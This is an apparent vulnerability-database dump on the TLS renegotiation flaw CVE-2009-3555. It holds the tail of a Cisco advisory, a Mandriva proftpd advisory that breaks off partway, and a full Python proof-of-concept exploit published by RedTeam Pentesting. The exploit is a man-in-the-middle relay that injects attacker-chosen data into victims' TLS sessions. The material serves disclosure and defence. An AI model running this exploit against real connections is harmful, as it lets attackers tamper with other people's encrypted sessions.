CSCtd05783 |\r\n| Advantage | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Operations | CSCtd05784 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Personal | CSCtd05759 |\r\n| Communicator | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Presence | CSCtd05791 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Provisioning | CSCtd05777 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Quick | CSCtd05738 |\r\n| Connect | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Service | CSCtd05780 |\r\n| Monitor | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Service | CStCd05778 |\r\n| Statistics Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified SIP Proxy | CSCtd05765 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unity | CSCtd02855 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NX-OS Software | CSCtd00699 and CSCtd00703 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Video Portal | CSCtd04097 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Video Surveillance | CSCtd02831 |\r\n| Media Server Software | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Video Surveillance | CSCtd02780 |\r\n| Operations Manager | |\r\n| Software | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wide Area File | CSCtd04106 |\r\n| Services Software (WAFS) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wireless Control | CSCtd01625 |\r\n| System | 
|\r\n|----------------------------+-------------------------------|\r\n| Cisco Wireless LAN | CSCtd01611 |\r\n| Controller (WLAN) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wireless Location | CSCtd04115 |\r\n| Appliance | |\r\n|----------------------------+-------------------------------|\r\n| CiscoWorks Common Services | CSCtd01597 |\r\n| Software | |\r\n|----------------------------+-------------------------------|\r\n| CiscoWorks Wireless LAN | CSCtd04111 |\r\n| Solution Engine (WLSE) | |\r\n+------------------------------------------------------------+\r\n\r\nThis vulnerability has been assigned the Common Vulnerabilities and\r\nExposures (CVE) identifier CVE-2009-3555.\r\n\r\n\r\nVulnerability Scoring Details\r\n+----------------------------\r\n\r\nCisco has provided scores for the vulnerability in this advisory based\r\non the Common Vulnerability Scoring System (CVSS). The CVSS scoring in\r\nthis Security Advisory is done in accordance with CVSS version 2.0.\r\n\r\nCVSS is a standards-based scoring method that conveys vulnerability\r\nseverity and helps determine urgency and priority of response.\r\n\r\nCisco has provided a base and temporal score. 
Customers can then\r\ncompute environmental scores to assist in determining the impact of the\r\nvulnerability in individual networks.\r\n\r\nCisco has provided an FAQ to answer additional questions regarding CVSS\r\nat:\r\n\r\nhttp://www.cisco.com/web/about/security/intelligence/cvss-qandas.html\r\n\r\nCisco has also provided a CVSS calculator to help compute the\r\nenvironmental impact for individual networks at:\r\n\r\nhttp://intellishield.cisco.com/security/alertmanager/cvss\r\n\r\n* TLS Renegotiation Vulnerability (all Cisco Bugs above)\r\n\r\nCVSS Base Score - 4.3\r\n Access Vector - Network\r\n Access Complexity - Medium\r\n Authentication - None\r\n Confidentiality Impact - None\r\n Integrity Impact - Partial\r\n Availability Impact - None\r\n\r\nCVSS Temporal Score - 4.1\r\n Exploitability - Functional\r\n Remediation Level - Unavailable\r\n Report Confidence - Confirmed\r\n\r\n\r\nImpact\r\n======\r\n\r\nThis section will be updated when more information is available.\r\n\r\nSoftware Versions and Fixes\r\n===========================\r\n\r\nThis section will be updated to include fixed software versions for\r\naffected Cisco products as they become available.\r\n\r\nWorkarounds\r\n===========\r\n\r\nWorkarounds are being investigated. This section will be updated when\r\nmore information becomes available.\r\n\r\nObtaining Fixed Software\r\n========================\r\n\r\nCisco has released free software updates that address this\r\nvulnerability. Prior to deploying software, customers should consult\r\ntheir maintenance provider or check the software for feature set\r\ncompatibility and known issues specific to their environment.\r\n\r\nCustomers may only install and expect support for the feature\r\nsets they have purchased. 
By installing, downloading, accessing\r\nor otherwise using such software upgrades, customers agree to be\r\nbound by the terms of Cisco's software license terms found at\r\nhttp://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,\r\nor as otherwise set forth at Cisco.com Downloads at\r\nhttp://www.cisco.com/public/sw-center/sw-usingswc.shtml.\r\n\r\nDo not contact psirt@cisco.com or security-alert@cisco.com for software\r\nupgrades.\r\n\r\nCustomers with Service Contracts\r\n- --------------------------------\r\n\r\nCustomers with contracts should obtain upgraded software through their\r\nregular update channels. For most customers, this means that upgrades\r\nshould be obtained through the Software Center on Cisco's worldwide\r\nwebsite at http://www.cisco.com.\r\n\r\nCustomers using Third Party Support Organizations\r\n- -------------------------------------------------\r\n\r\nCustomers whose Cisco products are provided or maintained through prior\r\nor existing agreements with third-party support organizations, such\r\nas Cisco Partners, authorized resellers, or service providers should\r\ncontact that support organization for guidance and assistance with the\r\nappropriate course of action in regards to this advisory.\r\n\r\nThe effectiveness of any workaround or fix is dependent on specific\r\ncustomer situations, such as product mix, network topology, traffic\r\nbehavior, and organizational mission. 
Due to the variety of affected\r\nproducts and releases, customers should consult with their service\r\nprovider or support organization to ensure any applied workaround or fix\r\nis the most appropriate for use in the intended network before it is\r\ndeployed.\r\n\r\nCustomers without Service Contracts\r\n- -----------------------------------\r\n\r\nCustomers who purchase direct from Cisco but do not hold a Cisco service\r\ncontract, and customers who purchase through third-party vendors but are\r\nunsuccessful in obtaining fixed software through their point of sale\r\nshould acquire upgrades by contacting the Cisco Technical Assistance\r\nCenter (TAC). TAC contacts are as follows.\r\n\r\n * +1 800 553 2447 (toll free from within North America)\r\n * +1 408 526 7209 (toll call from anywhere in the world)\r\n * e-mail: tac@cisco.com\r\n\r\nCustomers should have their product serial number available and be\r\nprepared to give the URL of this notice as evidence of entitlement to a\r\nfree upgrade. Free upgrades for non-contract customers must be requested\r\nthrough the TAC.\r\n\r\nRefer to\r\nhttp://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html\r\nfor additional TAC contact information, including localized telephone\r\nnumbers, and instructions and e-mail addresses for use in various\r\nlanguages.\r\n\r\nExploitation and Public Announcements\r\n=====================================\r\n\r\nThis vulnerability was initially discovered by Marsh Ray and Steve\r\nDispensa from PhoneFactor, Inc.\r\n\r\nCisco is not aware of any malicious exploitation of this vulnerability.\r\n\r\nProof-of-concept exploit code has been published for this vulnerability.\r\n\r\nStatus of this Notice: INTERIM\r\n==============================\r\n\r\nTHIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY\r\nANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF\r\nMERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. 
YOUR USE OF THE\r\nINFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS\r\nAT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS\r\nDOCUMENT AT ANY TIME.\r\n\r\nA stand-alone copy or Paraphrase of the text of this document that omits\r\nthe distribution URL in the following section is an uncontrolled copy,\r\nand may lack important information or contain factual errors.\r\n\r\nDistribution\r\n============\r\n\r\nThis advisory is posted on Cisco's worldwide website at:\r\n\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml\r\n\r\nIn addition to worldwide web posting, a text version of this notice is\r\nclear-signed with the Cisco PSIRT PGP key and is posted to the following\r\ne-mail and Usenet news recipients.\r\n\r\n * cust-security-announce@cisco.com\r\n * first-bulletins@lists.first.org\r\n * bugtraq@securityfocus.com\r\n * vulnwatch@vulnwatch.org\r\n * cisco@spot.colorado.edu\r\n * cisco-nsp@puck.nether.net\r\n * full-disclosure@lists.grok.org.uk\r\n * comp.dcom.sys.cisco@newsgate.cisco.com\r\n\r\nFuture updates of this advisory, if any, will be placed on Cisco's\r\nworldwide website, but may or may not be actively announced on mailing\r\nlists or newsgroups. 
Users concerned about this problem are encouraged\r\nto check the above URL for any updates.\r\n\r\nRevision History\r\n================\r\n\r\n+------------------------------------------------------------+\r\n| Revision 1.0 | 2009-November-9 | Initial public release |\r\n+------------------------------------------------------------+\r\n\r\nCisco Security Procedures\r\n=========================\r\n\r\nComplete information on reporting security vulnerabilities\r\nin Cisco products, obtaining assistance with security\r\nincidents, and registering to receive security information\r\nfrom Cisco, is available on Cisco's worldwide website at\r\nhttp://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.\r\nThis includes instructions for press inquiries regarding\r\nCisco security notices. All Cisco security advisories are available at\r\nhttp://www.cisco.com/go/psirt.\r\n\r\n+--------------------------------------------------------------------\r\nCopyright 2008-2009 Cisco Systems, Inc. 
All rights reserved.\r\n+--------------------------------------------------------------------\r\n\r\nUpdated: Nov 09, 2009 Document ID: 111046\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niEYEARECAAYFAkr4TCsACgkQ86n/Gc8U/uDNWgCfYptXVZhz0qn2DvRh2zUtZ5EF\r\nOS4AoJediPm3/t9XqYIdrjR5PNP25iY/\r\n=SkAu\r\n-----END PGP SIGNATURE-----\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-12600", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:34", "description": "", "published": "2009-12-21T00:00:00", "type": "packetstorm", "title": "TLS Renegotiation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3555"], "modified": "2009-12-21T00:00:00", "id": "PACKETSTORM:84112", "href": "https://packetstormsecurity.com/files/84112/TLS-Renegotiation-Exploit.html", "sourceData": "`#!/usr/bin/env python \n \n###################################### \n# # \n# RedTeam Pentesting GmbH # \n# kontakt@redteam-pentesting.de # \n# http://www.redteam-pentesting.de # \n# # \n###################################### \n \n# PoC exploit for the TLS renegotiation vulnerability (CVE-2009-3555) \n \n# License \n# ------- \n# CC-BY-SA http://creativecommons.org/licenses/by-sa/3.0/ \n \n# Timeline \n# -------- \n# 2009-12-21 initial public release \n \n# Known Issues \n# ------------ \n# Firefox: if it fails connecting to a TLS site too often, falls back to \n# issuing SSLv2 ClientHello only until browser is restarted \n# \n# wget: attempts SSLv2 ClientHello by default \n \n# References \n# ---------- \n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555 \n# http://www.phonefactor.com/sslgap \n# http://www.extendedsubset.com/ \n# http://www.g-sec.lu/practicaltls.pdf \n# http://tools.ietf.org/html/draft-ietf-tls-renegotiation-01 \n \nimport tlslite \nimport tlslite.api \nimport tlslite.messages \nimport tlslite.constants \nimport struct \nimport socket 
\nimport threading \nimport array \nimport sys \nimport optparse \n \n \nif not hasattr(threading.Thread, 'name'): \n# emulate python 2.6 threading module for earlier versions \nthreading.current_thread = threading.currentThread \nsetattr(threading.Thread, 'name', \nproperty(threading.Thread.getName, threading.Thread.setName)) \n \ndef forward(sock1, sock2): \nsock1.settimeout(1.0) \nwhile True: \ntry: \ndata = sock1.recv(4096) \nif not data: \nreturn \nsock2.send(data) \nexcept socket.error, ex_error: \nif ex_error[0] == 104: # Connection reset by peer \nreturn \nexcept socket.timeout, ex_timeout: \npass \n \n \nclass MessageWrapper(object): \ndef __init__(self, version = (3, 1), ssl2 = False): \nself.contentType = tlslite.messages.ContentType.handshake \nself.ssl2 = ssl2 \nself.client_version = version \n \ndef setType(self, type): \nself.contentType = type \n \ndef addBytes(self, bytes): \nself.bytes = bytes \n \ndef write(self, trial=False): \nif trial: \nraise Exception('Unsupported') \nreturn array.array('B', self.bytes) \n \ndef send_record(sock, msg_type, version_major, version_minor, record): \nmsg = struct.pack('!BBBH', msg_type, version_major, version_minor, len(record)) \nif type(record) != str: \nmsg += record.tostring() \nelse: \nmsg += record \nsock.send(msg) \n \ndef send_encapsulated(sslsock, type, messagebytes, version = (3, 1)): \nmsg = MessageWrapper(version) \nmsg.addBytes(struct.unpack('B'*len(messagebytes), messagebytes)) \nmsg.setType(type) \nfor dummy in sslsock._sendMsg(msg, True): \npass \n \ndef decrypt_record(sslsock, type, recordbytes): \nfor result in sslsock._decryptRecord(type, array.array('B', recordbytes)): \npass \nreturn result \n \ndef recv_record(sock): \ntry: \nheader = sock.recv(5) \nif not header: \nreturn None, None, None, None \nmsg_type, msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBBH', header) \nrecord = '' \nwhile len(record) != msg_length: \nrecord += sock.recv(msg_length - len(record)) 
\nreturn msg_type, msg_version_major, msg_version_minor, record \nexcept socket.error, ex: \nif ex[0] == 104: # Connection reset by peer \nreturn \n \ndef recv_clienthello(sock): \nheader_bytes = [] \nheader_bytes.append(sock.recv(1)) \nheader_bytes[0] = struct.unpack('!B', header_bytes[0])[0] \nif header_bytes[0] & 0x80: \n# Version 2.0 Client \"Record Layer\" \nheader_bytes.append(sock.recv(1)) \nheader_bytes[1] = struct.unpack('!B', header_bytes[1])[0] \nmsg_length = (header_bytes[0] & 0x7f) << 8 | header_bytes[1] \nmsg_version_major = 2 \nmsg_version_minor = 0 \nmsg_type = tlslite.constants.ContentType.handshake \nrecord = sock.recv(msg_length) \nelse: \nheader = sock.recv(4) \nmsg_type = header_bytes[0] \nmsg_version_major, msg_version_minor, msg_length = struct.unpack('!BBH', header) \nrecord = sock.recv(msg_length) \n \nreturn msg_type, msg_version_major, msg_version_minor, record \n \ndef send_hello_request(sock): \nsock.send(\"\\x16\" # Record Layer: Handshake Message \n+\"\\x03\\x01\" # Record Layer Version: TLS 1.0 \n+\"\\x00\\x04\" # Record Layer Length: 4 \n+\"\\x00\" # Handshake Message Type: Hello Request \n+\"\\x00\\x00\\x00\") # Handshake Message Length: 0 \n \ndef send_protocol_version_alert(sock): \nsock.send(\"\\x15\" # Record Layer: Alert\" \n+\"\\x03\\x01\" # Record Layer Version: TLS 1.0 \n+\"\\x00\\x02\" # Record Layer Length: 2 \n+\"\\x00\" # Alert Message: fatal \n+\"\\x46\") # Alert Message: protocol version \n \n \ndef handle_victim(victim, options, mitmcount): \n \nif options.one_shot and mitmcount != 0: \nprint threading.current_thread().name, '--one-shot specified and initial connection already handled, forwarding only' \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ntry: \nsock.connect(options.target) \nprint threading.current_thread().name, 'Connected to target %s:%u' % options.target \nexcept socket.error, ex: \nprint threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target \nprint 
threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1]) \nsys.exit(1) \n \nt1 = threading.Thread(target=forward, args=(sock, victim)) \nt1.start() \n \nt2 = threading.Thread(target=forward, args=(victim, sock)) \nt2.start() \n \nt1.join() \nsock.close() \n \nt2.join() \nvictim.close() \nreturn \n \n# obtain initial \"client hello\" message \nmsg_type, msg_version_major, msg_version_minor, hello_msg = recv_clienthello(victim) \nif msg_version_major == 2: \nprint threading.current_thread().name, \"client sent SSLv2 client hello message, exiting thread\" \nreturn \n \ntls_version = (msg_version_major, msg_version_minor) \ntype, length, version_major, version_minor, random, session_id_length = struct.unpack('!B3sBB32sB', hello_msg[:39]) \nresume_session = (session_id_length != 0) \nif resume_session: \nprint threading.current_thread().name, \"client attempting to resume session\" \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ntry: \nsock.connect(options.target) \nprint threading.current_thread().name, 'Connected to target %s:%u' % options.target \nexcept socket.error, ex: \nprint threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target \nprint threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1]) \nsys.exit(1) \n \n \nsslsock = tlslite.api.TLSConnection(sock) \nhandshake_settings = tlslite.HandshakeSettings.HandshakeSettings() \nhandshake_settings.minVersion = tls_version \nhandshake_settings.maxVersion = tls_version \nsslsock.handshakeClientCert(settings = handshake_settings) \n \n# inject prefix \nsslsock.write(options.inject) \nprint threading.current_thread().name, 'Injected %s' % repr(options.inject) \n \n# send original \"client hello\" message over the encrypted channel \nsend_encapsulated(sslsock, 22, hello_msg, tls_version) \n \n# now receive serveral TLS messages from the server, decrypt them, and forward \n# them to the client, until the server sends \"server hello 
done\" \n# these messages include \"server hello\", \"certificate\", \"server key exchange\", \n# unless the client is trying to resume a previous session \nprint threading.current_thread().name, \"about to receive server handshake messages\" \nserver_handshake_done = False \nwhile not server_handshake_done: \nmsg_type, msg_version_major, msg_version_minor, result = recv_record(sslsock.sock) \nif result: \nresult = decrypt_record(sslsock, msg_type, result) \nsend_record(victim, msg_type, msg_version_major, msg_version_minor, result) \nif result[0] == 0x0e: # server hello done - should terminate handshake \nserver_handshake_done = True \nelif resume_session and msg_type == 0x14: # change cipher spec - probably irrelevant \nserver_handshake_done = True \nelse: \nprint threading.current_thread().name, 'receive from server failed, exiting thread' \nreturn \nprint threading.current_thread().name, \"server handshake done\" \n \n \n# now its the the client's turn to send some messages, e.g. \n# \"client key exchange\" and \"change cipher spec\" \nprint threading.current_thread().name, \"about to receive client handshake messages\" \nhandshake_finished = False \nwhile not handshake_finished: \nmsg_type, msg_version_major, msg_version_minor, record = recv_record(victim) \nprint threading.current_thread().name, msg_type \nsend_encapsulated(sslsock, msg_type, record, tls_version) \nif msg_type == 0x14: # change cipher spec \nhandshake_finished = True \n \nprint threading.current_thread().name, \"client handshake done\" \n \n# message after \"change cipher spec\" must be sent in the \"clear\" \nmsg_type, msg_version_major, msg_version_minor, record = recv_record(victim) \nsend_record(sslsock.sock, msg_type, msg_version_major, msg_version_minor, record) \n \n# server should now send \"change cipher spec\" message, we decrypt and send that to the victim \nmsg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock) \nresult = decrypt_record(sslsock, 
msg_type, record) \nsend_record(victim, msg_type, msg_version_major, msg_version_minor, result) \n \n# finalize handshake \nmsg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock) \nif record: \nsend_record(victim, msg_type, msg_version_major, msg_version_minor, record) \nelse: \nsslsock.sock.close() \nvictim.close() \ndel sslsock \nreturn \n \n \n \n# the rest is just forwarding TLS records between both parties, \n# which we cannot interfere with anymore, apart from dropping server \n# responses \nif options.drop: \nsslsock.sock.close() \ndel sslsock \nelse: \nt1 = threading.Thread(target=forward, args=(sslsock.sock, victim)) \nt1.start() \n \nt2 = threading.Thread(target=forward, args=(victim, sslsock.sock)) \nt2.start() \n \nif not options.drop: \nt1.join() \nsslsock.sock.close() \n \nt2.join() \nvictim.close() \n \n \n \nif __name__ == \"__main__\": \nparser = optparse.OptionParser() \nparser.add_option('-l', '--listen', dest='listen_port', help='port to listen on', metavar='PORT', type='int', default=8443) \nparser.add_option('-b', '--bind', dest='bind_address', help='address to bind to', metavar='ADDRESS', default='0.0.0.0') \nparser.add_option('-t', '--target', dest='target', help='host and port to connect to', metavar='HOST:PORT' ) \nparser.add_option('-i', '--inject', dest='inject', help='string to inject', metavar='DATA') \nparser.add_option('', '--inject-file', dest='inject_file', help='inject data from a file', metavar='FILE') \nparser.add_option('', '--inject-base64', dest='inject_base64', help='string to inject, base64-encoded', metavar='DATA') \nparser.add_option('-o', '--one-shot', dest='one_shot', action='store_true', help='only mitm the first connection attempt, forward all other connections') \nparser.add_option('-d', '--drop-responses', dest='drop', action=\"store_true\", default=False, help='drop server responses after renegotiating') \n \n(options, args) = parser.parse_args() \n \nif len([i for i in (options.inject, 
options.inject_file, options.inject_base64) if i]) != 1: \nprint 'Exactly one injection option must be specified' \nsys.exit(1) \n \nif options.inject_file: \ntry: \noptions.inject = open(options.inject_file, 'r').read() \nexcept IOError, ex: \nprint ex \nsys.exit(1) \n \nif options.inject_base64: \nimport base64 \ntry: \noptions.inject = base64.decodestring(options.inject_base64) \nexcept base64.binascii.Error, ex: \nprint 'Error decoding base64 data: %s' % ex \nsys.exit(1) \n \n \nif not options.listen_port or \\ \nnot options.bind_address or \\ \nnot options.target or \\ \nnot options.inject: \nparser.print_help() \nsys.exit(1) \n \ntarget = options.target.split(':') \nif len(target)==2: \ntry: \ntarget[1] = int(target[1]) \nexcept ValueError: \ntarget[1] = None \nif len(target)!=2 or not target[0] or not target[1]: \nprint 'Target \\'%s\\' not in format HOST:PORT' % options.target \nsys.exit(1) \n \noptions.target = tuple(target) \n \ntry: \nlistensocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nlistensocket.bind((options.bind_address, options.listen_port)) \nprint 'Listening on %s:%u' % (options.bind_address, options.listen_port) \nexcept socket.error, ex: \nprint 'Couldn\\'t listen on %s:%u' % (options.bind_address, options.listen_port) \nprint 'Error code %u, \\'%s\\'' % (ex[0], ex[1]) \nsys.exit(1) \n \nlistensocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) \nlistensocket.listen(5) \n \nmitmcount = 0 \n \nwhile True: \ntry: \nvictim, victimaddr = listensocket.accept() \nprint 'New connection from %s:%u' % victimaddr \n \nthreading.Thread(target=handle_victim, args=(victim, options, mitmcount)).start() \nmitmcount += 1 \n \nexcept KeyboardInterrupt, ex: \nprint '\\nAborted by user, exiting...' 
\nlistensocket.close() \nsys.exit(1) \n \n \n`\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/84112/tls-reneg.py.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:337\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : proftpd\r\n Date : December 22, 2009\r\n Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 4.0,\r\n Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n A vulnerability has been identified and corrected in proftpd:\r\n \r\n The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as\r\n used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl\r\n in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l,\r\n GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS)\r\n 3.12.4 and earlier, and other products, does not properly associate\r\n renegotiation handshakes with an existing connection, which allows\r\n man-in-the-middle attackers to insert data into HTTPS sessions,\r\n and possibly other types of sessions protected by TLS or SSL, by\r\n sending an unauthenticated request that is processed retroactively\r\n by a server in a post-renegotiation context, related to a plaintext\r\n injection attack, aka the Project Mogul issue (CVE-2009-3555).\r\n \r\n Packages for 2008.0 are provided for Corporate Desktop 2008.0\r\n customers.\r\n \r\n This update fixes this vulnerability.\r\n _______________________________________________________________________\r\n\r\n 
References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\r\n http://bugs.proftpd.org/show_bug.cgi?id=3324\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2008.0:\r\n b9b190ac1eb5d3729025435fe27d2410 2008.0/i586/proftpd-1.3.2-0.3mdv2008.0.i586.rpm\r\n 352ed8620a05f7d9a3f9852bc726775c 2008.0/i586/proftpd-devel-1.3.2-0.3mdv2008.0.i586.rpm\r\n 3c4accef7143329906820bcce43e810b \r\n2008.0/i586/proftpd-mod_autohost-1.3.2-0.3mdv2008.0.i586.rpm\r\n 57b921e47c6820412923161d751cc741 2008.0/i586/proftpd-mod_ban-1.3.2-0.3mdv2008.0.i586.rpm\r\n 08df98fb4b0d4170586384e439020ac9 2008.0/i586/proftpd-mod_case-1.3.2-0.3mdv2008.0.i586.rpm\r\n de51d0e68218af3f126d7d055850745c \r\n2008.0/i586/proftpd-mod_ctrls_admin-1.3.2-0.3mdv2008.0.i586.rpm\r\n ee8343e5f45fb2a23f4f5663cad92910 2008.0/i586/proftpd-mod_gss-1.3.2-0.3mdv2008.0.i586.rpm\r\n 4174e8c0359e5e73d74468f59c2a2a8f \r\n2008.0/i586/proftpd-mod_ifsession-1.3.2-0.3mdv2008.0.i586.rpm\r\n 8700c37c4ccb147146018adb54b868dc 2008.0/i586/proftpd-mod_ldap-1.3.2-0.3mdv2008.0.i586.rpm\r\n a8d526ad49bd15d3daa4deb0f7a4daa4 2008.0/i586/proftpd-mod_load-1.3.2-0.3mdv2008.0.i586.rpm\r\n 3e469f53af8eb3124a26ed1624020683 \r\n2008.0/i586/proftpd-mod_quotatab-1.3.2-0.3mdv2008.0.i586.rpm\r\n 0e86455066c3b477f141ede0910fc955 \r\n2008.0/i586/proftpd-mod_quotatab_file-1.3.2-0.3mdv2008.0.i586.rpm\r\n 56a7876b1176fb921f617ef266eb65f8 \r\n2008.0/i586/proftpd-mod_quotatab_ldap-1.3.2-0.3mdv2008.0.i586.rpm\r\n 41603859dbd0665a55d608fcff538b88 \r\n2008.0/i586/proftpd-mod_quotatab_radius-1.3.2-0.3mdv2008.0.i586.rpm\r\n fe63333e393a45732ccaedb635a16d41 \r\n2008.0/i586/proftpd-mod_quotatab_sql-1.3.2-0.3mdv2008.0.i586.rpm\r\n 26e9ad76b1c22212e260ccf336246b21 2008.0/i586/proftpd-mod_radius-1.3.2-0.3mdv2008.0.i586.rpm\r\n bc3f19ec11fd18073c246c0bfeb4bbd9 2008.0/i586/proftpd-mod_ratio-1.3.2-0.3mdv2008.0.i586.rpm\r\n 66c70743a6030991c75875c42fd9b245 
\r\n2008.0/i586/proftpd-mod_rewrite-1.3.2-0.3mdv2008.0.i586.rpm\r\n 14a6cfaafd1a81719681ae5fd549226c 2008.0/i586/proftpd-mod_shaper-1.3.2-0.3mdv2008.0.i586.rpm\r\n 29ad593a905c1d4087f63bd98f755b75 \r\n2008.0/i586/proftpd-mod_site_misc-1.3.2-0.3mdv2008.0.i586.rpm\r\n b576a439128814e65018d37307ef89f2 2008.0/i586/proftpd-mod_sql-1.3.2-0.3mdv2008.0.i586.rpm\r\n 071b2bf259a4e6dae750e3d90231f3cc \r\n2008.0/i586/proftpd-mod_sql_mysql-1.3.2-0.3mdv2008.0.i586.rpm\r\n 716e28933156a0b68f9e6562e34286d8 \r\n2008.0/i586/proftpd-mod_sql_postgres-1.3.2-0.3mdv2008.0.i586.rpm\r\n b49c1e1395dea07f57501bb08d918c78 2008.0/i586/proftpd-mod_time-1.3.2-0.3mdv2008.0.i586.rpm\r\n 2fb275d3838849f732956a83c60551db 2008.0/i586/proftpd-mod_tls-1.3.2-0.3mdv2008.0.i586.rpm\r\n 870b85dc26c78344681b862421148bac 2008.0/i586/proftpd-mod_wrap-1.3.2-0.3mdv2008.0.i586.rpm\r\n 107bd74f488b08b637a7626bc5176f0d \r\n2008.0/i586/proftpd-mod_wrap_file-1.3.2-0.3mdv2008.0.i586.rpm\r\n 52536c6f73adfe3ff7a454491da5a403 \r\n2008.0/i586/proftpd-mod_wrap_sql-1.3.2-0.3mdv2008.0.i586.rpm \r\n deb5bda5904c3327f58415a0b558b2e8 2008.0/SRPMS/proftpd-1.3.2-0.3mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2008.0/X86_64:\r\n 039d35ee6d603e50c414e2bf06c6d043 2008.0/x86_64/proftpd-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 2a47940a552d57d042943ebe4ab5d85c 2008.0/x86_64/proftpd-devel-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n cb2696e6ef979113fde7a7e85efcb21d \r\n2008.0/x86_64/proftpd-mod_autohost-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n f4d9804686013d384ac0e48b386bfc94 \r\n2008.0/x86_64/proftpd-mod_ban-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 3d33970457a83ef89314b49d643de4ff \r\n2008.0/x86_64/proftpd-mod_case-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 70c3fed5e0a9b511b9f17482ccaef698 \r\n2008.0/x86_64/proftpd-mod_ctrls_admin-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 135b4a1342ee812e97cdf4c0bbc0a118 \r\n2008.0/x86_64/proftpd-mod_gss-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 4ba3ec21951d95441e18fc9e01129f49 \r\n2008.0/x86_64/proftpd-mod_ifsession-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 
